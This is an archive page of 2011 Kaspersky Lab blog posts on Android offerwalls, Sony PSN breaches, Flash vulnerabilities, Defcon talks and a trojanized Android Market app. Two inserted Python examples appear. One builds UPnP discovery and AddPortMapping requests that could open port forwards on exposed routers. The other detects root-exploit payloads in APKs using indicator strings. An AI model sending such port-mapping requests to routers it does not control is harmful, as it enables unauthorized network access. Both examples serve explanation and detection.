
Research|Are "Offerwalls" siphoning your personal information?

Kaspersky Lab Expert
Posted October 19, 15:29  GMT
Tags: Mobile Malware, Google Android

A relatively new development in app advertising has a concerning feature: it collects much of the same information that many Android Trojans steal. As part of app promotion campaigns, “offerwalls” are used by Pay Per Install (PPI) services to promise app developers wider adoption and more revenue. So where is the real danger? It lies in the way these services uniquely identify users and in the information they collect to do so.

What is Pay Per Install?

Pay Per Install, in the Android app world, is a service offered by specialized advertisers to app developers with the aim of exposing their apps to a larger audience. Many such services exist, for example Tapjoy and Everbadge; the latter promises to increase app revenue by “50-400%”. These services rely on a particular method of tracking users, and the app developer has to enable that tracking somehow. In most cases an SDK (software development kit) supplied by the PPI service must be integrated, which adds the service's tracking code to the developer's application.

Incidents|Return of the Hack, Playstation Accounts breached again

Kaspersky Lab Expert
Posted October 13, 14:28  GMT
Tags: Sony

Sony has reported that it has had a number of sign-in attempts on accounts belonging to users on its various networks. In a statement on the Sony site it was revealed that “Sony Network Entertainment International LLC and Sony Online Entertainment (SOE) have detected a large amount of unauthorized sign-in attempts on PlayStation®Network (PSN), Sony Entertainment Network (SEN) and Sony Online Entertainment (SOE) services.”

Events|Adobe's cost of popularity

Kaspersky Lab Expert
Posted September 22, 17:29  GMT
Tags: Adobe

Adobe pushed an emergency update to its ubiquitous Flash Player yesterday that closes 6 separate vulnerabilities. Of the 6, 4 can lead directly to code execution (CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430), one is a universal cross-site scripting issue (CVE-2011-2444), and the last can lead to information disclosure (CVE-2011-2429).

We recommend that you update all systems immediately. Adobe also states that CVE-2011-2444, the cross-site scripting issue, has reportedly been exploited in the wild. The update is available here: UPDATE

Events|Facebook, now with more(?) privacy!

Kaspersky Lab Expert
Posted August 30, 12:30  GMT
Tags: Social Networks, Google, Facebook

When logging into Facebook today, I was greeted with a new set of controls. In the wake of the apparent success of Google+, it seems that Facebook would like to reassure their user base that they too can control who sees what you post, and who you tag. You can now easily tag who you’re with, where you are, and most importantly; who can see your posts.


I'm here at Defcon watching the hacker masses share their information. As usual, it's incredibly crowded, but the new venue at the Rio hotel is a welcome upgrade. Las Vegas is as hot and crazy as ever. It's never a boring visit.

So far there have been some great talks, and I'd like to highlight a few favorites.

The talk by Moxie Marlinspike, "SSL and the Future of Authenticity", covering the shortcomings of the Certificate Authority system, was an eye-opening look at how broken that system is. As always, Moxie is an engaging and relevant speaker. His proposed replacement is a distributed system in which multiple independent parties, rather than a single CA, verify the site you're connecting to. With a few kinks still to work out, it's an interesting idea, and it is certainly time to move away from the current model.

Another talk, by Daniel Garcia, called "UPnP Mapping", demonstrated an issue that is quite widespread on the Internet. UPnP (Universal Plug and Play) is an interoperability protocol suite originally developed by Microsoft with the idea that devices could be added to a network with zero configuration. At best it has never worked very well; at worst, it hands a remote party all sorts of information about, and control over, your device from the Internet, because some routers answer UPnP requests on their Internet-facing interface. Mr. Garcia demonstrated a tool that scans a network block, builds a list of vulnerable routers, and then issues commands to them. In some cases these routers could be turned into an open proxy, or put to many other, more malicious purposes.
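The discover-then-command flow the talk demonstrated, as an added example that is not Mr. Garcia's tool and not code from the original post: it parses a constructed SSDP discovery reply, pulls the WANIPConnection control URL out of a constructed device description, and builds the SOAP AddPortMapping request that an Internet-side client could send to a router that exposes UPnP on its WAN interface. The 192.0.2.1 address, the SSDP reply and the description XML are constructed samples; nothing is sent on the network.

```python
"""UPnP IGD enumeration on constructed offline samples: SSDP reply -> device
description -> WANIPConnection control URL -> SOAP AddPortMapping request."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

IGD_NS = "urn:schemas-upnp-org:device-1-0"
WAN_IP = "urn:schemas-upnp-org:service:WANIPConnection:1"

# The M-SEARCH probe a client multicasts to 239.255.255.250:1900. A router that
# answers this, or the SOAP requests below, on its public address is the kind
# of device the talk describes (assumption about the "vulnerable routers").
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"
)

# Constructed sample reply; 192.0.2.1 is a documentation address, not a real host.
SAMPLE_SSDP_REPLY = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "LOCATION: http://192.0.2.1:5000/rootDesc.xml\r\n"
    "SERVER: Linux/2.6 UPnP/1.0 MiniUPnPd/1.2\r\n"
    "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000001::urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"
)

# Constructed, trimmed device description as it would be fetched from LOCATION.
SAMPLE_DESC_XML = f"""<?xml version="1.0"?>
<root xmlns="{IGD_NS}">
 <device>
  <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
  <friendlyName>Example Router</friendlyName>
  <deviceList><device>
   <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
   <deviceList><device>
    <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
    <serviceList><service>
     <serviceType>{WAN_IP}</serviceType>
     <controlURL>/ctl/IPConn</controlURL>
    </service></serviceList>
   </device></deviceList>
  </device></deviceList>
 </device>
</root>"""


def parse_ssdp_headers(reply: str) -> dict:
    """Turn the SSDP reply into an upper-cased header dict (LOCATION, SERVER, ...)."""
    headers = {}
    for line in reply.split("\r\n")[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().upper()] = value.strip()
    return headers


def find_control_url(location: str, desc_xml: str, service: str = WAN_IP):
    """Walk the nested device tree and resolve the controlURL of `service`
    against the LOCATION URL; None if the router does not offer that service."""
    root = ET.fromstring(desc_xml)
    for svc in root.iter(f"{{{IGD_NS}}}service"):
        if svc.findtext(f"{{{IGD_NS}}}serviceType") == service:
            return urljoin(location, svc.findtext(f"{{{IGD_NS}}}controlURL"))
    return None


def soap_request(control_url: str, service: str, action: str, args: dict):
    """Build the HTTP POST (request line, headers, body) for one UPnP action."""
    arg_xml = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{service}">{arg_xml}</u:{action}></s:Body>'
        "</s:Envelope>"
    )
    url = urlparse(control_url)
    headers = {
        "Host": url.netloc,
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": f'"{service}#{action}"',
        "Content-Length": str(len(body)),
    }
    return f"POST {url.path} HTTP/1.1", headers, body


def add_port_mapping(control_url: str, external_port: int, internal_client: str,
                     internal_port: int, protocol: str = "TCP"):
    """AddPortMapping: the action that turns a WAN-exposed IGD into a pivot. If
    the implementation does not restrict NewInternalClient to the LAN, the
    external port can be forwarded to an arbitrary host (the open-proxy case)."""
    return soap_request(control_url, WAN_IP, "AddPortMapping", {
        "NewRemoteHost": "", "NewExternalPort": external_port,
        "NewProtocol": protocol, "NewInternalPort": internal_port,
        "NewInternalClient": internal_client, "NewEnabled": 1,
        "NewPortMappingDescription": "added via UPnP", "NewLeaseDuration": 0,
    })


if __name__ == "__main__":
    ctl = find_control_url(parse_ssdp_headers(SAMPLE_SSDP_REPLY)["LOCATION"], SAMPLE_DESC_XML)
    line, hdrs, body = add_port_mapping(ctl, 8080, "192.168.1.10", 80)
    print(ctl, line, hdrs["SOAPAction"], sep="\n")
```

Sending the request is a single HTTP POST of `body` to the control URL with those headers. The check a practitioner wants is whether a router answers M-SEARCH or the SOAP POST on its WAN address at all; run it only against equipment you own, and if the answer is yes, disable UPnP on the WAN side or the whole service.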

Incidents|Return of the Playstation Network

Kaspersky Lab Expert
Posted May 17, 15:28  GMT
Tags: Gaming Consoles, Sony

Today is May 17, almost exactly a month after the massive breach of Sony’s PSN network. If you live in North America then you may be pleased to know that the Playstation network has finally come back online. Due to the enormous amount of subscribers to the service, the restart has been a bit shaky, with reports of password reset emails clogging ISP mail servers. Despite the hiccups, it seems that the service is gradually returning.

If you are a customer of the Sony service, you will need to immediately change your password as well as install a firmware update to your system. Sony has pledged a much stronger security environment to its customers and partners, and this appears to be the beginning of many changes. Sony has previously stated that they have rebuilt the entire network from scratch and moved their PSN infrastructure to a new data center in an undisclosed location. I’m not sure why this emphasis on security wasn’t a focus of the original model, but maybe Sony can prevent future mishaps. Perhaps all the additional outside scrutiny will help, but only time will tell.

Incidents|Playstation data gets pwned

Kaspersky Lab Expert
Posted April 27, 13:07  GMT
Tags: Gaming Consoles

After a long service blackout, Sony reported yesterday that its PSN gamer network had been compromised. Sony further admitted that all kinds of user data had become available to an unknown attacker. The personal details available to the attacker include your name, address, email address, date of birth, PSN login name and password; even password security answers may have been obtained. In addition, Sony stated: “While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility." Sony does not speculate on when its network may come back online but states that it is rebuilding the network and undergoing external security audits.

Events|Twitter - Malware through time

Kaspersky Lab Expert
Posted March 23, 15:00  GMT
Tags: Social Networks

Twitter is celebrating its 5th birthday this week. Since its inception in July of 2006 Twitter has grown to become an essential part of many people’s daily lives in just 140 characters. Twitter has also spawned multiple malware campaigns and continues to be a successful avenue of attack to this day.

Security on Twitter has had an eventful history, even considering its relatively young age. There have been all sorts of attacks, from abuse of trending topics to hacked admin accounts to account hijacks, just to name a few. In fact, due to Twitter’s popularity and its repeated security lapses, the Federal Trade Commission brought charges against Twitter in 2010. As a result Twitter had to adopt a number of new security policies, and it now offers such security options as an always-use-SSL setting and OAuth support for external Twitter clients.

Incidents|Malware in the Android Market part 3

Kaspersky Lab Expert
Posted March 07, 17:24  GMT
Tags: Google

A new blog update from Google promises a response to the outbreak of the so-called “DroidDream” malware that went live on the Android Market last week:

Malware in the Android Market Part 1

Malware in the Android Market Part 2

According to the blog, Google will initiate its remote-removal process by pushing the installation of a new app called “Android Market Security Tool March 2011.” We’ve had a look at this app: it does not fix the underlying vulnerability, it simply removes the applications known to be malicious, so a device that has already been rooted remains rootable. Google further promises changes to the Market to deal with this type of issue and claims to be “working with our partners to provide the fix for the underlying security issues.”

Incidents|Malware in the Android Market

Kaspersky Lab Expert
Posted March 02, 13:46  GMT

Every day, we see more reports about malware in the Android Market. This time three developers known as MYOURNET, Kingmall2010, and we20090202, possibly the same person, were offering a number of Android apps for free download.

Many, if not all of the apps, were trojanized copies of legitimate apps from other developers.

I downloaded one app in particular called Super Guitar Solo. Upon reviewing the app, I found it contains the popular “rage against the cage” root exploit commonly used to “root” Android phones and gain superuser privileges. As any Linux guru will tell you, once you have superuser rights, you have full, administrator level access to the phone’s operating system. In this case the exploit is launched without the owner’s consent.

So what is the purpose of this Trojan? The application will attempt to gather product ID, device type, language, country, and userID among other things, and then upload them to a remote server. Unlike most of the other samples seen so far, there is no attempt at sending or receiving premium rate SMS messages.

This discovery is important because up until now most Android malware has been found outside of the Android Market, and installing from outside the Market requires the user to take a number of special steps before the phone can be infected. In this case, users are even able to install the app from the web with the new Android Market format. We have previously talked about this here: The Dark Side of the new Android Market

It's also interesting to point out that, just as our researchers predicted last year, the cybercriminals have started taking advantage of jailbreaking tools as mentioned here: The Dangers of Jailbreaking

One important observation is that these are probably not the only live malware in the Android Market. Kaspersky recommends that you always check the permissions an application requests at install time. This case also highlights the dangers of jailbreaking or rooting your devices: the same exploit used to root phones deliberately is here run silently against the owner. This particular root exploit has been detected by Kaspersky as Exploit.AndroidOS.Lotoor.g and Exploit.AndroidOS.Lotoor.j since February 1st, so if you are a Kaspersky Mobile Security user, you are already protected.
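A first static triage of a repackaged APK for a bundled native root exploit, as an added example and not Kaspersky's detection logic for Exploit.AndroidOS.Lotoor: it unzips the package in memory, flags ELF binaries found outside the normal lib/ directory (where legitimate NDK libraries live), and looks for indicator strings. The sample APK is constructed inline (it is not the Super Guitar Solo sample), and the indicator strings, severity rules and directory list are assumptions for illustration.

```python
"""Static APK triage for native payloads hidden in assets/ or res/raw/, run on
a constructed in-memory APK. An APK is a ZIP file, so no Android tooling is
needed for this first pass."""
import io
import zipfile

ELF_MAGIC = b"\x7fELF"
# Directories where a repackaged app tends to stash payload binaries (assumption).
PAYLOAD_DIRS = ("assets/", "res/raw/", "lib/")
# Indicator strings from public builds of the rooting tool (assumption, illustrative).
INDICATORS = (b"rageagainstthecage", b"CVE-2010-EASY")


def build_sample_apk() -> bytes:
    """Constructed stand-in for a trojanized app: a fake ELF in assets/ next to
    ordinary resources and a normal NDK library. Not real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<binary-xml placeholder>")
        zf.writestr("classes.dex", b"dex\n035\0" + b"\0" * 32)
        zf.writestr("res/raw/song.mid", b"MThd" + b"\0" * 16)
        zf.writestr("assets/rageagainstthecage",
                    ELF_MAGIC + b"\x01\x01\x01" + b"\0" * 9 + b"[*] CVE-2010-EASY ...")
        zf.writestr("lib/armeabi/libaudio.so", ELF_MAGIC + b"\0" * 60)
    return buf.getvalue()


def triage_apk(apk_bytes: bytes) -> list:
    """Return one finding per suspicious entry: path, whether it is an ELF
    binary, which indicator strings matched (in name or content) and a severity.
    ELF outside lib/ or any indicator hit is 'high'; ELF under lib/ is 'info'."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir() or not name.startswith(PAYLOAD_DIRS):
                continue
            data = zf.read(name)
            is_elf = data.startswith(ELF_MAGIC)
            hits = [s.decode() for s in INDICATORS
                    if s in data or s.decode() in name]
            if not (is_elf or hits):
                continue
            if hits or (is_elf and not name.startswith("lib/")):
                severity = "high"
            else:
                severity = "info"
            findings.append({"path": name, "elf": is_elf,
                             "indicators": hits, "severity": severity,
                             "size": len(data)})
    return findings


def verdict(findings: list) -> str:
    """Collapse the findings to the worst severity seen ('clean' if none)."""
    levels = {f["severity"] for f in findings}
    return "high" if "high" in levels else ("info" if "info" in levels else "clean")


if __name__ == "__main__":
    results = triage_apk(build_sample_apk())
    for f in results:
        print(f"{f['severity']:5} {f['path']} elf={f['elf']} indicators={f['indicators']}")
    print("verdict:", verdict(results))
```

The point of splitting lib/ from assets/ and res/raw/ is that native code in lib/ is how every NDK app ships, so an ELF there says nothing on its own, while an ELF that the app has to copy out of assets/ and chmod before executing is exactly the pattern a rooting payload needs. A second pass would decode the binary AndroidManifest.xml to review the requested permissions, which this example does not cover.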

Kaspersky will continue to examine this sample and update with any future information.

UPDATE: Google has now removed the malicious apps and the corresponding download page from the Android Market.
